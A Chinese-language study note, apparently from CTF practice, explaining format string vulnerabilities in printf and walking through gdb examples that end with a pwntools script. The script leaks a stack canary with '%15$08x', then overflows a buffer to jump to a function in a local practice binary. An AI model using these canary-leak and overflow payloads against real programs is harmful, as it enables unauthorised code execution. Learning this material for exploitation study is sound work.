参考:https://bbs.pediy.com/thread-250858.htm
目录
Format String 介绍
1 |
|
在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应到第二个参数 "Whitzard" ,而 "%d" 则对应到第三个参数999。
Format String符号说明
在格式化字符串中,"%s"、"%d" 等类型的符号叫符号说明。
%3$s:第三个参数(从栈顶往下数第4(1+3)个参数)
格式化字符串漏洞
printf函数在执行时,首先进行格式化字符串的解析——从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上。如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,即有更多的符号说明需要被匹配时,printf会根据解析结果和调用约定去取栈上(reg)相应的值并输出,就有可能造成泄露。
TIPS
参数放在栈上时要保证对齐,保证输入的地址的完整可用性,32位以四字节对齐,64位以八字节对齐,payload在构造时需要精心设计;
如果'%s'解析到了一个不合理的或者不可访问的地址时,程序就会崩溃,由此也能衍生出一种构造多个'%s'让程序崩溃的攻击方式。
例1:
执行到printf函数执行之前
经验证可知vararg的值应该来自于0xffffd4b0-4,也就是0xffffd4b4
如果不做任何操作,执行printf函数时会报错
尝试改变0xffffd4b4处的值为“lingqi”
继续执行,成功输出
例2:
运行,输入lingqi
若添加一些符号说明呢
可见,若输入某种特殊字符,系统会识别并去栈上匹配并输出
例3:
思路:有两个read函数与一个printf函数,可利用第一个read函数和printf函数泄露canary地址,利用第二个read函数send payload。
1.(在gdb中)disass func
观察到 ebp-0xc 为canary的地址
2.查看canary的值:x $ebp-0xc
3.在printf处下断点,运行到printf执行之前。
查看栈:stack 0x28
可见canary距栈顶有15行(canary那行不算)
4.尝试输出canary:
重新运行:r
用到%K$p:输入%15$08x:偏移量为15,输出8位,回车
n,回车
成功打印出canary
5.写payload
查看输入%15$08x之后的栈
思路:payload = 输入的字符串(d5cc)距canary(d5ec)的距离 + canary + canary(d5ec)到返回地址(d5fc)的距离 + exploit函数返回地址
from pwn import *
p = process("./printf3")
p.sendline("%15$08x") //利用第一个read函数,发送%15$08x,以获取canary
canary = p.recv()[:8] //获取canary。[:8]:只要8位,吃掉默认的回车
print(canary)
canary = canary.decode("hex")[::-1] //[::-1]:canary倒叙
str_canary = 4*8 //输入的字符串(d5cc)距canary(d5ec)的距离
canary_ret = 3*4 //canary(d5ec)到返回地址(d5fc)的距离
exploit_add = p32(0x080491f6) //exploit函数返回地址,利用disass exploit查看
payload = str_canary*'a' + canary + canary_ret*'a' + exploit_add
p.sendline(payload)
p.interactive()